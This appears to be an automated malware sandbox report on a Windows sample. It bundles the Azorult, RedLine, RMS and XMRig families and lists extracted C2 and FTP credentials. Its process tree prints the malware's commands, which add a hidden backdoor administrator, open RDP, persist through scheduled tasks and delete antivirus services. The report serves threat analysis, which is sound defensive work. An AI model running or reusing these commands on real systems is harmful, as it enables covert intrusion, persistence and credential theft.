Resubmissions

18-11-2020 14:18

201118-dj27sn3f52 10

18-11-2020 13:42

201118-1arz86e7w6 10

18-11-2020 13:38

201118-n8jh228ctn 10

Analysis

  • max time kernel
    1802s
  • max time network
    1808s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-11-2020 14:18

General

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    45.141.184.35
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    109.248.203.91
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • XMRig Miner Payload 3 IoCs
  • ASPack v2.12-2.42 5 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocks application from running via registry modification

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 40 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 56 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 8 IoCs
  • Drops file in System32 directory 5 IoCs
  • Drops file in Program Files directory 31 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 6 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 3 IoCs
  • Modifies registry class 6 IoCs
  • NTFS ADS 3 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\update.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\update.bin.exe"
    1⤵
    • Drops file in Drivers directory
    • Modifies WinLogon
    • Drops file in Program Files directory
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1048
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1012
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:208
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1376
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            5⤵
            • Runs .reg file with regedit
            PID:4056
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            5⤵
            • Runs .reg file with regedit
            PID:652
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            5⤵
            • Delays execution with timeout.exe
            PID:2284
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3796
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:2596
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1276
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            5⤵
            • Views/modifies file attributes
            PID:2500
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            5⤵
            • Views/modifies file attributes
            PID:3880
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            5⤵
              PID:1636
            • C:\Windows\SysWOW64\sc.exe
              sc config RManService obj= LocalSystem type= interact type= own
              5⤵
                PID:2672
              • C:\Windows\SysWOW64\sc.exe
                sc config RManService DisplayName= "Microsoft Framework"
                5⤵
                  PID:856
            • C:\ProgramData\Windows\winit.exe
              "C:\ProgramData\Windows\winit.exe"
              3⤵
              • Executes dropped EXE
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:1056
              • C:\Program Files (x86)\Windows Mail\WinMail.exe
                "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
                4⤵
                • Suspicious use of SetWindowsHookEx
                PID:4688
                • C:\Program Files\Windows Mail\WinMail.exe
                  "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                  5⤵
                  • Suspicious use of SetWindowsHookEx
                  PID:5104
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
                4⤵
                  PID:4564
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 5
                    5⤵
                    • Delays execution with timeout.exe
                    PID:4532
            • C:\programdata\install\cheat.exe
              C:\programdata\install\cheat.exe -pnaxui
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2316
              • C:\ProgramData\Microsoft\Intel\taskhost.exe
                "C:\ProgramData\Microsoft\Intel\taskhost.exe"
                3⤵
                • Executes dropped EXE
                • NTFS ADS
                • Suspicious use of SetWindowsHookEx
                PID:1232
                • C:\Programdata\RealtekHD\taskhostw.exe
                  C:\Programdata\RealtekHD\taskhostw.exe
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of SetWindowsHookEx
                  PID:4336
                • C:\ProgramData\Microsoft\Intel\R8.exe
                  C:\ProgramData\Microsoft\Intel\R8.exe
                  4⤵
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  PID:4960
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
                    5⤵
                      PID:4868
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
                        6⤵
                        • Modifies registry class
                        PID:4648
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im Rar.exe
                          7⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4172
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im Rar.exe
                          7⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2352
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout 3
                          7⤵
                          • Delays execution with timeout.exe
                          PID:4100
                        • C:\Windows\SysWOW64\chcp.com
                          chcp 1251
                          7⤵
                            PID:4844
                          • C:\rdp\Rar.exe
                            "Rar.exe" e -p555 db.rar
                            7⤵
                            • Executes dropped EXE
                            PID:5064
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im Rar.exe
                            7⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4420
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout 2
                            7⤵
                            • Delays execution with timeout.exe
                            PID:4928
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                            7⤵
                              PID:4956
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                                8⤵
                                  PID:4364
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                                    9⤵
                                      PID:4976
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                                      9⤵
                                        PID:4832
                                      • C:\Windows\SysWOW64\netsh.exe
                                        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                                        9⤵
                                          PID:5036
                                        • C:\Windows\SysWOW64\net.exe
                                          net.exe user "john" "12345" /add
                                          9⤵
                                            PID:4812
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 user "john" "12345" /add
                                              10⤵
                                                PID:4600
                                            • C:\Windows\SysWOW64\chcp.com
                                              chcp 1251
                                              9⤵
                                                PID:4848
                                              • C:\Windows\SysWOW64\net.exe
                                                net localgroup "Администраторы" "John" /add
                                                9⤵
                                                  PID:4724
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                                                    10⤵
                                                      PID:4644
                                                  • C:\Windows\SysWOW64\net.exe
                                                    net localgroup "Administratorzy" "John" /add
                                                    9⤵
                                                      PID:2748
                                                      • C:\Windows\SysWOW64\net1.exe
                                                        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                                                        10⤵
                                                          PID:5108
                                                      • C:\Windows\SysWOW64\net.exe
                                                        net localgroup "Administrators" John /add
                                                        9⤵
                                                          PID:4992
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 localgroup "Administrators" John /add
                                                            10⤵
                                                              PID:4512
                                                          • C:\Windows\SysWOW64\net.exe
                                                            net localgroup "Administradores" John /add
                                                            9⤵
                                                              PID:1124
                                                              • C:\Windows\SysWOW64\net1.exe
                                                                C:\Windows\system32\net1 localgroup "Administradores" John /add
                                                                10⤵
                                                                  PID:4220
                                                              • C:\Windows\SysWOW64\net.exe
                                                                net localgroup "Пользователи удаленного рабочего стола" John /add
                                                                9⤵
                                                                  PID:2928
                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                    C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                                                                    10⤵
                                                                      PID:4920
                                                                  • C:\Windows\SysWOW64\net.exe
                                                                    net localgroup "Пользователи удаленного управления" John /add
                                                                    9⤵
                                                                      PID:1432
                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                                                                        10⤵
                                                                          PID:4256
                                                                      • C:\Windows\SysWOW64\net.exe
                                                                        net localgroup "Remote Desktop Users" John /add
                                                                        9⤵
                                                                          PID:4396
                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                            C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                                                                            10⤵
                                                                              PID:4720
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            net localgroup "Usuarios de escritorio remoto" John /add
                                                                            9⤵
                                                                              PID:5008
                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                                                                                10⤵
                                                                                  PID:3448
                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                                9⤵
                                                                                  PID:5012
                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                    C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                                    10⤵
                                                                                      PID:1416
                                                                                  • C:\rdp\RDPWInst.exe
                                                                                    "RDPWInst.exe" -i -o
                                                                                    9⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies WinLogon
                                                                                    • Drops file in Program Files directory
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4904
                                                                                    • C:\Windows\SYSTEM32\netsh.exe
                                                                                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                      10⤵
                                                                                        PID:5140
                                                                                    • C:\rdp\RDPWInst.exe
                                                                                      "RDPWInst.exe" -w
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5216
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                                                                                      9⤵
                                                                                        PID:5248
                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                        net accounts /maxpwage:unlimited
                                                                                        9⤵
                                                                                          PID:5268
                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                            C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                                                            10⤵
                                                                                              PID:5288
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                                                                                            9⤵
                                                                                            • Drops file in Program Files directory
                                                                                            • Views/modifies file attributes
                                                                                            PID:5320
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +s +h "C:\Program Files\RDP Wrapper"
                                                                                            9⤵
                                                                                            • Drops file in Program Files directory
                                                                                            • Views/modifies file attributes
                                                                                            PID:5352
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +s +h "C:\rdp"
                                                                                            9⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:5368
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout 2
                                                                                        7⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:2388
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
                                                                                  4⤵
                                                                                  • Drops file in Drivers directory
                                                                                  PID:2232
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:4696
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:4944
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:4772
                                                                                • C:\ProgramData\WindowsTask\update.exe
                                                                                  C:\ProgramData\WindowsTask\update.exe
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5040
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
                                                                              2⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:3768
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
                                                                              2⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:2708
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
                                                                              2⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:1016
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
                                                                              2⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:3928
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c sc start appidsvc
                                                                              2⤵
                                                                                PID:1128
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  sc start appidsvc
                                                                                  3⤵
                                                                                    PID:2208
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c sc start appmgmt
                                                                                  2⤵
                                                                                    PID:2488
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      sc start appmgmt
                                                                                      3⤵
                                                                                        PID:2600
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
                                                                                      2⤵
                                                                                        PID:3380
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          sc config appidsvc start= auto
                                                                                          3⤵
                                                                                            PID:672
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
                                                                                          2⤵
                                                                                            PID:2696
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              sc config appmgmt start= auto
                                                                                              3⤵
                                                                                                PID:1400
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sc delete swprv
                                                                                              2⤵
                                                                                                PID:2816
                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                  sc delete swprv
                                                                                                  3⤵
                                                                                                    PID:3204
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sc stop mbamservice
                                                                                                  2⤵
                                                                                                    PID:2820
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc stop mbamservice
                                                                                                      3⤵
                                                                                                        PID:2192
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
                                                                                                      2⤵
                                                                                                        PID:2236
                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                          sc stop bytefenceservice
                                                                                                          3⤵
                                                                                                            PID:3492
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                                                                                                          2⤵
                                                                                                            PID:1816
                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                              sc delete bytefenceservice
                                                                                                              3⤵
                                                                                                                PID:2136
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c sc delete mbamservice
                                                                                                              2⤵
                                                                                                                PID:1368
                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                  sc delete mbamservice
                                                                                                                  3⤵
                                                                                                                    PID:3804
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c sc delete crmsvc
                                                                                                                  2⤵
                                                                                                                    PID:3548
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc delete crmsvc
                                                                                                                      3⤵
                                                                                                                        PID:3060
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                                                                                                                      2⤵
                                                                                                                        PID:1460
                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                          netsh advfirewall set allprofiles state on
                                                                                                                          3⤵
                                                                                                                            PID:388
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                          2⤵
                                                                                                                            PID:496
                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                              netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                              3⤵
                                                                                                                                PID:3152
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                              2⤵
                                                                                                                                PID:1560
                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                                  3⤵
                                                                                                                                    PID:3628
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                                  2⤵
                                                                                                                                    PID:1344
                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                      netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                                      3⤵
                                                                                                                                        PID:3352
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                      2⤵
                                                                                                                                        PID:2932
                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                          netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                          3⤵
                                                                                                                                            PID:4120
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
                                                                                                                                          2⤵
                                                                                                                                            PID:4140
                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                              icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
                                                                                                                                              3⤵
                                                                                                                                              • Modifies file permissions
                                                                                                                                              PID:4236
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                            2⤵
                                                                                                                                              PID:4152
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                                3⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:4232
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                              2⤵
                                                                                                                                                PID:4272
                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                  icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies file permissions
                                                                                                                                                  PID:4428
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                2⤵
                                                                                                                                                  PID:4284
                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies file permissions
                                                                                                                                                    PID:4404
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4304
                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies file permissions
                                                                                                                                                      PID:4412
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4464
                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies file permissions
                                                                                                                                                        PID:4508
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4548
                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                          icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
                                                                                                                                                          3⤵
                                                                                                                                                          • Modifies file permissions
                                                                                                                                                          PID:4660
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4684
                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                            icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies file permissions
                                                                                                                                                            PID:4728
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4744
                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                              icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies file permissions
                                                                                                                                                              PID:4948
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4756
                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                                3⤵
                                                                                                                                                                • Modifies file permissions
